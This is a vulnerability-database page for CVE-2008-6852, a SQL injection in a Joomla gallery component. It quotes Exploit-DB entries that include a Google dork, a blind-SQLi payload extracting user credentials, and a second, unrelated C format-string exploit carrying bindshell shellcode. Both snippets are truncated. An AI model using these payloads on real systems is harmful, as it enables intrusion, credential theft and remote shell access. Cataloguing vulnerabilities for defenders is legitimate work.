CVE-2008-6852
published 2009-07-07CVE-2008-6852: SQL injection vulnerability in the Ice Gallery (com_ice) component 0.5 beta 2 for Joomla! allows remote attackers to execute arbitrary SQL commands via the…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.4th percentile
SQL injection vulnerability in the Ice Gallery (com_ice) component 0.5 beta 2 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| markus_donhauser | ice_gallery_component_for_joomla | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Ice Gallery 0.5b2 - 'catid' Blind SQL Injection
exploitdb·2008-12-24
CVE-2008-6852 Joomla! Component Ice Gallery 0.5b2 - 'catid' Blind SQL Injection
Joomla! Component Ice Gallery 0.5b2 - 'catid' Blind SQL Injection
---
#############################################################
Joomla Component com_ice(catid) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability : Blind SQL injection
#[~] Google Dork : inurl:com_ice "catid"
#[!] Ice Gallery
#[!] 29/08/06
#[!] Markus Donhauser
#[!] [email protected]
#[!] 0.5 beta 2
###################################################
Example:
http://localHost/path/index.php?option=com_ice&catid=1[SQL code]
SQL code:
and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limi
Exploit-DB
Axigen 5.0.2 - AXIMilter Remote Format String
exploitdb·2008-01-21
CVE-2008-0434 Axigen 5.0.2 - AXIMilter Remote Format String
Axigen 5.0.2 - AXIMilter Remote Format String
---
/*
* Axigen 5.0.x AXIMilter Format String Exploit
*
* by hempel (JAN 16 2008)
*
* thx to mu-b (digit-labs.org)
*
*/
#include
#include
#include
#include
#include
#include
#include
char buf[] =
"FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: "
/* offsets */
"\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"
"\xbc\x96\x05\x08\xbd\x96\x05\x08\xbe\x96\x05\x08\xbf\x96\x05\x08"
"\xc0\x96\x05\x08"
/* format string */
"%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
"17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
"\r\nRCPT:\r\nVERI: "
/* bindshell code (port 4141) */
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdc"
"\xc8\x06\xb7\x83\xeb\xfc\xe2\xf4\xed\x13\x55\xf4\x8f\xa2\x04\xdd"
"\xba\x90\
No writeups or analysis indexed.
2009-07-07
Published